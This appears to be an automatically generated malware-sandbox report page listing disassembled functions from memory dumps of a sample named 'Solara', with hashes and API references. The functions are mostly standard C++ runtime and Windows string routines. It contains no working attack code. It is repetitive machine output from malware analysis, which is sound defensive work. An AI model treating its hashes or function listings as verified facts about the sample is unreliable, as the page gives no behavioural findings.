Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 8e491b833e0bb378ec2ffd94d6efa614d6075b21c411131fef7fbe56edbfbc3c
Instruction ID: ffa0e72fe77e8afbc91b39e3ba74bac2aa14aabdf1479c64c06ef54dd1e5642a
Opcode Fuzzy Hash: 8e491b833e0bb378ec2ffd94d6efa614d6075b21c411131fef7fbe56edbfbc3c
Instruction Fuzzy Hash: 0001D635D002259BCF04EBA4E851BAE7771AF84310F284108F910AB3D1CF709E45A791

Function 00C3C904 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C90B
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C915
int.LIBCPMT ref: 00C3C92C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C3C94F
std::_Facet_Register.LIBCPMT ref: 00C3C966
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C986
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C993

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: f8de17b5aee08ee4d55bc6b889c1eb4b218b295f3dc24185d25825b56ae59b12
Instruction ID: 867605e38cde92d6609f2993e56c63734da8851078e8ade9e6be1e760621c9d4
Opcode Fuzzy Hash: f8de17b5aee08ee4d55bc6b889c1eb4b218b295f3dc24185d25825b56ae59b12
Instruction Fuzzy Hash: EB01D235D10325ABCF05FBA4E855BAEB772BF84320F294408F915AB391CF349E419B90

Function 00C3CBED Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CBF4
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CBFE
int.LIBCPMT ref: 00C3CC15

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CC38
std::_Facet_Register.LIBCPMT ref: 00C3CC4F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CC6F
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CC7C

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: b48fc3071901ab447ce896a7f3c7c1bfcad2a5e4015f7bac5bb21dbe08636ea6
Instruction ID: b6794035559651a0ca31b143e3e01f0b5523332fa71c70a9bcc0886b6a790f41
Opcode Fuzzy Hash: b48fc3071901ab447ce896a7f3c7c1bfcad2a5e4015f7bac5bb21dbe08636ea6
Instruction Fuzzy Hash: 5B01F9759002299BCF04FB64E896BBD7771AF84710F180108F915A77D1CF749E46D790

Function 00C3CC82 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CC89
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CC93
int.LIBCPMT ref: 00C3CCAA

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CCCD
std::_Facet_Register.LIBCPMT ref: 00C3CCE4
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD04
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CD11

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: ad24b69557694cda1ea6c9441f3d5a1bf506867b4d83b36352e2a0871ac91018
Instruction ID: aad0f45d846318f644b64ff75a1072cd5b0e06c16e8eb3333ccb48bda91cc176
Opcode Fuzzy Hash: ad24b69557694cda1ea6c9441f3d5a1bf506867b4d83b36352e2a0871ac91018
Instruction Fuzzy Hash: 9001F9759102259BCF05FBA4E855AFD7B71AF84310F144018F911A7391DF319E42D7A1

Function 00C3CDAC Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CDB3
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CDBD
int.LIBCPMT ref: 00C3CDD4

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CDF7
std::_Facet_Register.LIBCPMT ref: 00C3CE0E
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CE2E
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CE3B

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 803bb835e3b25df15b5c806bb66674b54a47453fe44a9a8d9a437c90d90656f5
Instruction ID: 184d0d08208dece43445aa5b5b099865e3ec3f3adc2cccf0efa92dbb1b1ad1a5
Opcode Fuzzy Hash: 803bb835e3b25df15b5c806bb66674b54a47453fe44a9a8d9a437c90d90656f5
Instruction Fuzzy Hash: 8701D27591022A9BCF05FBA4E951BFEB7B1BF84320F140409FA11AB791CF349E429B90

Function 00C3CD17 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CD1E
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CD28
int.LIBCPMT ref: 00C3CD3F

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C3CD62
std::_Facet_Register.LIBCPMT ref: 00C3CD79
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CD99
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CDA6

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 45b464a6ec3bd6795856396ca364eaf4f721588da947047779feedb5781d85f5
Instruction ID: d9a9ede6c95da9d3e0ff8aef46fee99d97d51906597a91aaf6dcb333057864ab
Opcode Fuzzy Hash: 45b464a6ec3bd6795856396ca364eaf4f721588da947047779feedb5781d85f5
Instruction Fuzzy Hash: 8601D635910225DBCB05EBA4D851ABDB771BF85310F140418F915AB391CF309E429B90

Function 00C3D095 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D09C
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D0A6
int.LIBCPMT ref: 00C3D0BD

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C3D0E0
std::_Facet_Register.LIBCPMT ref: 00C3D0F7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D117
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D124

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 4f975efbcf4987bde1f478b04351ee781f2a5ea91607e827713ae7e16683ef0a
Instruction ID: 8ae4aa0800fcab0226846dc5bdb79fcbca9ab881827700e861799b7b606989da
Opcode Fuzzy Hash: 4f975efbcf4987bde1f478b04351ee781f2a5ea91607e827713ae7e16683ef0a
Instruction Fuzzy Hash: D301D63591022A9BCF04EBA4F812AFD7771BF84724F144119E912A7391CF349E46A791

Function 00C3D12A Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D131
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D13B
int.LIBCPMT ref: 00C3D152

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C3D175
std::_Facet_Register.LIBCPMT ref: 00C3D18C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D1AC
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D1B9

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 1926855432f039fa54c8c74abb1374b30be511143b78a21ce8ddd800181d57d4
Instruction ID: eeea980679d6d2f7d031b9488e0d4a842550c8008604158e8c6d876206e286e2
Opcode Fuzzy Hash: 1926855432f039fa54c8c74abb1374b30be511143b78a21ce8ddd800181d57d4
Instruction Fuzzy Hash: 5501F975D00225ABCF05FBA4E815BBD7771BF84720F144508F911A7391CF349E469790

Function 00C23C2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C23C3A
int.LIBCPMT ref: 00C23C4D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C23C80
std::_Lockit::~_Lockit.LIBCPMT ref: 00C23C96
Concurrency::cancel_current_task.LIBCPMT ref: 00C23CA1

Strings

@Gx, xrefs: 00C23C3F, 00C23C8D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: @Gx
API String ID: 2081738530-1849521182
Opcode ID: 598b107570ad918f6c053c458ce87d3597e2dbe470ebfb53e91f3a19293e0397
Instruction ID: f4471824b3d1c00b73c1a4ecd564139eb9b3a65b1d71b8739b81db4618209047
Opcode Fuzzy Hash: 598b107570ad918f6c053c458ce87d3597e2dbe470ebfb53e91f3a19293e0397
Instruction Fuzzy Hash: 8901F732500134ABCB18FBA4F8558ED7769DF80720B144119F812A7690DF34DF429B90

Function 00CA3248 Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,00CA3518,00000000,00000000,?,00000000,?,?,?,?,00000000,?), ref: 00CA32EE
__freea.LIBCMT ref: 00CA3483
__freea.LIBCMT ref: 00CA3489
__freea.LIBCMT ref: 00CA34BF
__freea.LIBCMT ref: 00CA34C5
__freea.LIBCMT ref: 00CA34D5

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: 242cbb360d3a791b32afd40cdf43ae56c8e8992c6d5544dc48e535fb0d0d6b82
Instruction ID: 0384e3eb24b85282d4f01079817dd5efab3c6c59900fba6b5db880bce4fc47a6
Opcode Fuzzy Hash: 242cbb360d3a791b32afd40cdf43ae56c8e8992c6d5544dc48e535fb0d0d6b82
Instruction Fuzzy Hash: 43711872A042879BDF229E948C61BBFBFB5AF4A31CF244059F824A7281DB35DF019750

Function 00C4E828 Relevance: 9.2, APIs: 6, Instructions: 225COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00C4E8B3
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C4E93F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4E9AA
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C4E9C6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4EA29
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00C4EA46

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 8a7c02717bae3c8bb0dc301ca47f360418524d8f5629fbeff182c09f076cb59d
Instruction ID: 852ee1a80275aeed7c83f7c1a949ef58027f01db47ed05f64e1e2037c241ca4d
Opcode Fuzzy Hash: 8a7c02717bae3c8bb0dc301ca47f360418524d8f5629fbeff182c09f076cb59d
Instruction Fuzzy Hash: E371D132D002299BDF209FA9CC85BEEBFB5FF09354F1A4555E860A7191D7309E00E7A0

Function 00C2C635 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C2C67E
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C2C6E9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2C706
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C2C745
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C2C7A4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C2C7C7

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 77a73a1492f29231f9996714507fa6707ef86f9e3563d28d951f9ea272be8a3f
Instruction ID: a945f9ff04404d35f872031c170e769d5d8f17438cef83d95c92a6024155bf97
Opcode Fuzzy Hash: 77a73a1492f29231f9996714507fa6707ef86f9e3563d28d951f9ea272be8a3f
Instruction Fuzzy Hash: 8C51BD7250022AABEF205F60ECC5FAF7BB9EF04B90F154129F925E6550E730CE109BA0

Function 00C5C4D1 Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5C515
DName::operator+.LIBCMT ref: 00C5C521

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

DName::operator+=.LIBCMT ref: 00C5C5DF

Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5ADCE
Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5B098

Part of subcall function 00C566AD: DName::operator+.LIBCMT ref: 00C566CE

DName::operator+.LIBCMT ref: 00C5C59C

Part of subcall function 00C56816: DName::operator=.LIBVCRUNTIME ref: 00C56837

DName::DName.LIBVCRUNTIME ref: 00C5C603
DName::operator+.LIBCMT ref: 00C5C60F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: 179b9fabfa2fc68db8e918fea97bb90e637d2f05ebfa5cf5b50cca8e49de2f17
Instruction ID: 167c54928d2e60b33b3fd596005dce6c4052ee5cf670064a7a645b6d2b787388
Opcode Fuzzy Hash: 179b9fabfa2fc68db8e918fea97bb90e637d2f05ebfa5cf5b50cca8e49de2f17
Instruction Fuzzy Hash: 9841C3BCA00344AFDB14DBE8C891A9D7BF5AB09301F844049EA56D7291EB35AACCD758

Function 00C5B121 Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C5C625: Replicator::operator[].LIBCMT ref: 00C5C662

DName::operator=.LIBVCRUNTIME ref: 00C5B1CD

Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5ADCE
Part of subcall function 00C5AD63: DName::operator+.LIBCMT ref: 00C5B098

DName::operator+.LIBCMT ref: 00C5B187
DName::operator+.LIBCMT ref: 00C5B193
DName::DName.LIBVCRUNTIME ref: 00C5B1D7
DName::operator+.LIBCMT ref: 00C5B1F4
DName::operator+.LIBCMT ref: 00C5B200

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 3a522d2604200fc74a71386ced39b19bcbe1fb760ff7141efdafe69b9475487c
Instruction ID: 0cbf92e01a1c7ef768fe704b597bdbb5226939e8701a96489a71b8d31cef1c20
Opcode Fuzzy Hash: 3a522d2604200fc74a71386ced39b19bcbe1fb760ff7141efdafe69b9475487c
Instruction Fuzzy Hash: 2A31D2BDA047049FCB14DFA4C855AAEBFF4AF58301F04841DE99697351EB30AE88CB18

Function 00C269A7 Relevance: 9.1, APIs: 6, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C269AE
std::_Lockit::_Lockit.LIBCPMT ref: 00C269B8
int.LIBCPMT ref: 00C269CF

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C26A09
std::_Lockit::~_Lockit.LIBCPMT ref: 00C26A29
Concurrency::cancel_current_task.LIBCPMT ref: 00C26A36

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
